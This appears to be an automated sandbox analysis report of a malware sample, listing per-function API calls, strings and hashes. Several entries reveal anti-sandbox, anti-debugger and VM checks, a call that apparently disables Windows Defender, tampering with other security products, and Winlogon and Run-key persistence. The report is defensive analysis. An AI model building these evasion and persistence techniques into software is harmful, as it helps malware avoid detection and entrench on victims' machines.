                                                                                                                                                                                                                  • Part of subcall function 00403870: RegCloseKey.KERNELBASE(y9@), ref: 004038CF
                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00403999
                                                                                                                                                                                                                • strstr.MSVCRT ref: 004039AB
                                                                                                                                                                                                                • strstr.MSVCRT ref: 004039C4
                                                                                                                                                                                                                • strstr.MSVCRT ref: 004039DD
                                                                                                                                                                                                                • strstr.MSVCRT ref: 004039F6
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403A0F
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A86
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AAC
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403ABE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strstr$Name$FileModule$CharCloseDirectoryInformationOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                                • String ID: Dave$MALNETVM$SANDBOX$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\$test user$test_item.exe
                                                                                                                                                                                                                • API String ID: 3012634381-649399103
                                                                                                                                                                                                                • Opcode ID: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
                                                                                                                                                                                                                • Instruction ID: 2772e22a84d8afe3dc88946ac3df406ee6e1198dc71f6cbec9561b14d5c35e9d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0341CA71A5031866DF20DB608D85FEB7B6CAF54B05F0C05BAE644F51D0E6F89B848F94

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 147 4021b0-4022fe CreateFileA 148 402330-402335 147->148 149 402300-40232a DeviceIoControl CloseHandle 147->149 149->148
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004022F3
                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402323
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040232A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                • API String ID: 33631002-3172865025
                                                                                                                                                                                                                • Opcode ID: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
                                                                                                                                                                                                                • Instruction ID: 9d4a94b5be36249e2462cbbb3280e2e36e0391c5559e4b339ada8e43b165569f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D04194B0D01358DEEB20CF95D9887DEFEB5BB04309F5081ADD5186B241C7B90A89CF55

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 167 401000-40101c IsDebuggerPresent 168 401022-401032 FindWindowA 167->168 169 40111b-401123 167->169 168->169 170 401038-401061 memset CreateToolhelp32Snapshot 168->170 171 401063-40107d Process32First 170->171 172 4010d5-4010e1 call 401aa0 170->172 174 401083-401091 StrStrIA 171->174 178 4010e3-4010ef call 401aa0 172->178 179 401124-40112f 172->179 176 401115-401119 174->176 177 401097-4010a1 Process32Next 174->177 181 4010a7-4010b1 176->181 177->174 180 4010a3 177->180 178->179 188 4010f1-4010fd call 401aa0 178->188 180->181 183 4010d1-4010d3 181->183 184 4010b3-4010c1 GetHandleInformation 181->184 183->172 183->179 184->183 186 4010c3-4010c8 184->186 186->183 187 4010ca-4010cb FindCloseChangeNotification 186->187 187->183 188->179 191 4010ff-40110c PathFileExistsA 188->191 191->179 192 40110e-401114 191->192
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00401014
                                                                                                                                                                                                                • FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040104B
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 00401071
                                                                                                                                                                                                                • StrStrIA.KERNELBASE(?,wireshark.exe), ref: 0040108D
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 0040109D
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004010CB
                                                                                                                                                                                                                • PathFileExistsA.KERNELBASE(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindProcess32$ChangeCloseCreateDebuggerExistsFileFirstHandleInformationNextNotificationPathPresentSnapshotToolhelp32Windowmemset
                                                                                                                                                                                                                • String ID: OLLYDBG$\\?\globalroot\systemroot\system32\vmx_fb.dll$dumpcap.exe$idag.exe$vmwaretray.exe$wireshark.exe
                                                                                                                                                                                                                • API String ID: 1862551656-1290435522
                                                                                                                                                                                                                • Opcode ID: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
                                                                                                                                                                                                                • Instruction ID: c60aa232edd69d9eafc6284c2fbf788a46e5342051cb1b5dbcb922c87a134ace
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB31E9B160430057D310AB66AC49B6BB7ECDBD8764F01013BFF44F62E1E77C888586AA

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 220 403870-4038a4 RegOpenKeyExA 221 4038d5-4038da 220->221 222 4038a6-4038c9 RegQueryValueExA 220->222 223 4038db-4038ec RegCloseKey 222->223 224 4038cb-4038cf RegCloseKey 222->224 223->221 225 4038ee-4038f5 223->225 224->221 225->221 226 4038f7-4038fe 225->226 226->221 227 403900-403907 226->227 227->221 228 403909-403911 227->228
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(y9@), ref: 004038CF
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(y9@), ref: 004038DF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                • String ID: E$HARDWARE\DESCRIPTION\System$M$Q$SystemBiosVersion$U$y9@
                                                                                                                                                                                                                • API String ID: 1607946009-2685269968
                                                                                                                                                                                                                • Opcode ID: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
                                                                                                                                                                                                                • Instruction ID: a73e17f2ece4285d148bbbe7d21167b22b4148350c2fc20c0d473cf4689022c2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 951165F2E00208FAEB20DF90DC45BAA7BB89B45315F1081EAE708751C1D7B86A448F5D

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 229 402660-40268c CoInitializeEx 230 40268e-402691 229->230 231 40269f-4026c7 GetModuleFileNameW SysAllocString 229->231 230->231 232 402693-402699 230->232 233 402849-40284f 231->233 234 4026cd-4026d8 SysAllocString 231->234 232->231 235 4028a4-4028a9 232->235 236 402851-402856 233->236 237 402859-40285e 233->237 238 402833-402841 SysFreeString 234->238 239 4026de-4026ff CoCreateInstance 234->239 236->237 242 402860-402865 237->242 243 402868-40286d 237->243 240 402843-402844 SysFreeString 238->240 241 402846 238->241 244 402705-40270a 239->244 245 402807-40280a 239->245 240->241 241->233 242->243 247 402877-40287c 243->247 248 40286f-402874 243->248 244->245 246 402710-402721 244->246 245->238 246->238 256 402727-402738 246->256 249 402886-40288b 247->249 250 40287e-402883 247->250 248->247 252 402895-402897 249->252 253 40288d-402892 249->253 250->249 254 402899-40289c 252->254 255 40289e CoUninitialize 252->255 253->252 254->235 254->255 255->235 256->238 258 40273e-402748 256->258 259 40274d-40274f 258->259 259->238 260 402755-40275c 259->260 261 402831 260->261 262 402762-402773 260->262 261->238 262->261 264 402779-402791 262->264 266 402793-4027b3 CoCreateInstance 264->266 267 40280c-40281d 264->267 268 4027b5-4027ba 266->268 269 4027bc 266->269 267->261 273 40281f-402823 267->273 268->269 270 4027be-4027c3 268->270 269->270 270->261 272 4027c5-4027d0 270->272 272->261 276 4027d2-4027e3 272->276 273->261 274 402825-40282e 273->274 274->261 276->261 278 4027e5-4027f4 276->278 278->261 280 4027f6-402805 278->280 280->261
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040267F
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026AD
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004026C0
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026D2
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E60,00000000,00004401,00404E70,?), ref: 004026FB
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E80,00000000,00004401,00404E90,?), ref: 004027AF
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00402BFA), ref: 0040283D
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402844
                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0040289E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                • String ID: Windows Explorer
                                                                                                                                                                                                                • API String ID: 1140695583-228612681
                                                                                                                                                                                                                • Opcode ID: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
                                                                                                                                                                                                                • Instruction ID: bcca5549e6a36079ff93457438ec30656b046552e7bb8440c472f06e22bdaec7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C714175A006059FCB10EB98CD84DAFB7B9AF88704B248266E904FB3D0D7B5ED42CB54

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 304 4020c0-40211c memset SHGetFolderPathA 305 402187-402189 304->305 306 40211e-40213f PathAppendA SetCurrentDirectoryA 304->306 308 402192-4021a2 305->308 309 40218b-40218c FreeLibrary 305->309 306->305 307 402141-402153 LoadLibraryA 306->307 307->305 310 402155-402163 GetProcAddress 307->310 309->308 310->305 311 402165-402172 310->311 311->305
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004020FE
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402114
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040212A
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402137
                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402146
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040215B
                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 0040218C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                • String ID: MpClient.dll$WDEnable$Windows Defender
                                                                                                                                                                                                                • API String ID: 1010965793-3061216624
                                                                                                                                                                                                                • Opcode ID: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
                                                                                                                                                                                                                • Instruction ID: 17fe50366fb736dd5c610a74938a74168bdb82ca3e71c76a348591a6388f5d5b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8411D5B5900315BBC7209FA49D89FAABB7CEB48710F10027AFB05B61C0C2784E058AA8

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 313 401de0-401df5 314 401e97-401e9d 313->314 315 401dfb-401e08 call 4013c0 313->315 315->314 318 401e0e-401e19 RtlImageNtHeader 315->318 319 401e75-401e89 GetProcessHeap HeapValidate 318->319 320 401e1b-401e3c GetTickCount GetModuleHandleA 318->320 319->314 323 401e8b-401e91 GetProcessHeap HeapFree 319->323 321 401e55-401e70 call 4012e0 320->321 322 401e3e-401e4c GetProcAddress 320->322 321->319 322->321 324 401e4e 322->324 323->314 324->321
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004013C0: CreateFileA.KERNELBASE(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004013E7
                                                                                                                                                                                                                  • Part of subcall function 004013C0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401403
                                                                                                                                                                                                                  • Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401423
                                                                                                                                                                                                                  • Part of subcall function 004013C0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 0040142A
                                                                                                                                                                                                                  • Part of subcall function 004013C0: memset.MSVCRT ref: 0040143D
                                                                                                                                                                                                                  • Part of subcall function 004013C0: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
                                                                                                                                                                                                                  • Part of subcall function 004013C0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
                                                                                                                                                                                                                  • Part of subcall function 004013C0: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
                                                                                                                                                                                                                  • Part of subcall function 004013C0: UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
                                                                                                                                                                                                                  • Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
                                                                                                                                                                                                                  • Part of subcall function 004013C0: HeapValidate.KERNEL32(00000000), ref: 004014A4
                                                                                                                                                                                                                  • Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
                                                                                                                                                                                                                  • Part of subcall function 004013C0: HeapFree.KERNEL32(00000000), ref: 004014B4
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00401E0F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00401E23
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401E34
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401E44
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E7E
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401E81
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E8E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401E91
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 3168189189-3277137149
                                                                                                                                                                                                                • Opcode ID: 1044d5b8489757274fbc6076754cecbbd1deaec704c57d239c16298d4a1a6bbf
                                                                                                                                                                                                                • Instruction ID: 1ecd765bda1492a879e644bd2742a44ced4fa461e9381bf643e5a49b1714824c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1044d5b8489757274fbc6076754cecbbd1deaec704c57d239c16298d4a1a6bbf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40112171601314EBD710ABB6ED49B9B7A989F85751B104135FB09F32E1DA38CD04CAA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023D6
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004023F6
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004023FC
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040241A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040241D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                • API String ID: 3225117150-898603304
                                                                                                                                                                                                                • Opcode ID: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
                                                                                                                                                                                                                • Instruction ID: 3dcb9c770a9bbc908c19996743ce3c51c52a4f68684fd20990d5167f2ff57074
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B31E0B1C0121CABDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401152
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401171
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 0040118A
                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,?,?,?,?,?,00000000), ref: 004011B0
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,?,?,?,00000000), ref: 004011CF
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,?,?,?,?,00000000), ref: 004011DC
                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 004011F3
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 0040120E
                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000104,7604DB30), ref: 00401275
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000102,?,?,?,?,?,?,00000000), ref: 00401294
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 004012B0
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012BE
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012C8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SystemDrive, xrefs: 004011CA
                                                                                                                                                                                                                • userinit, xrefs: 004012AA
                                                                                                                                                                                                                • software\microsoft\windows\currentversion\run, xrefs: 0040128A
                                                                                                                                                                                                                • software\microsoft\windows nt\currentversion\winlogon, xrefs: 004011A6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Valuememset$AdminBackslashCloseCreateEnvironmentFlushInformationOpenPathUserVariableVolume_snprintf
                                                                                                                                                                                                                • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 1223198359-2324515132
                                                                                                                                                                                                                • Opcode ID: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
                                                                                                                                                                                                                • Instruction ID: 4a3cd719fa0b6a36e3fea1ee33c0aaef39b8e779ef0c2e0c240036d9f7b98d71
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5341BEB164020CBFEB10DBA49DC9EEA777CEB94704F0041B9F345B6191E6B45F888BA4

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040253C
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025A0
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025C3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025D8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004025E4
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004025FF
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040260E
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040261A
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402629
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402635
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402644
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402647
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                • API String ID: 606440919-2829233815
                                                                                                                                                                                                                • Opcode ID: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
                                                                                                                                                                                                                • Instruction ID: 03c6ffd3b6dc1066bd99cfbbbb98c4e24752acf73b2e09b6b1ad6d20697dc7f7
